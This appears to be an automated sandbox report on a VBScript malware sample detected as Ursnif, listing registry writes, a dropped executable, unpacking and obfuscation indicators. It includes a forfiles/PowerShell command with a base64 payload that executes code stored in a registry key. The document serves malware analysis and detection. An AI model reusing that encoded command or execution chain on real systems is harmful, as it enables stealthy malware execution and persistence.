Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401EB5 NtQueryVirtualMemory,4_2_00401EB5
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00724498 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError,4_2_00724498
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00721D96 memcpy,memcpy,lstrcatW,CreateEventA,_wcsupr,lstrlenW,NtQueryInformationProcess,CloseHandle,4_2_00721D96
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00721CCC RtlInitUnicodeString,NtSetValueKey,NtDeleteValueKey,NtClose,RtlNtStatusToDosError,4_2_00721CCC
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_007212AF RtlInitUnicodeString,NtCreateKey,4_2_007212AF
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401C944_2_00401C94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_0072B3F04_2_0072B3F0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_0072AB9A4_2_0072AB9A
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: Nuovo documento 1.vbsInitial sample: Strings found which are bigger than 50
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.evad.winVBS@35/66@14/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\ActiveJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeMutant created: \Sessions\1\BaseNamedObjects\Local\BD0F010C-8477-D729-4003-A9471CBE2200
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Reads ini filesShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Nuovo documento 1.vbsVirustotal: Detection: 10%
Source: Nuovo documento 1.vbsReversingLabs: Detection: 12%
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9500 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\forfiles.exe 'C:\Windows\System32\forfiles.exe' /p C:\Windows\system32 /s /c 'cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==' /m p*ll.*e
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samplesShow sources
Source: Nuovo documento 1.vbsStatic file information: File size 8681858 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeUnpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeUnpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack
Compiles C# or VB.Net codeShow sources
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_00401A88
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_00401C83 push ecx; ret 4_2_00401C93
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006BB7C0 push edx; ret 4_2_006BB94E
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B6056 push cs; retf 4_2_006B6058
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B64DE push ebx; ret 4_2_006B64DF
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B2900 push cs; iretd 4_2_006B2901
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B09E2 push edx; iretd 4_2_006B09ED
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B11E6 push ecx; ret 4_2_006B11E7
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B05DD push edx; ret 4_2_006B05E2
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B5F0E push ecx; ret 4_2_006B5F27
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_006B47AF pushfd ; iretd 4_2_006B47B0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeCode function: 4_2_0072B3DF push ecx; ret 4_2_0072B3EF

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
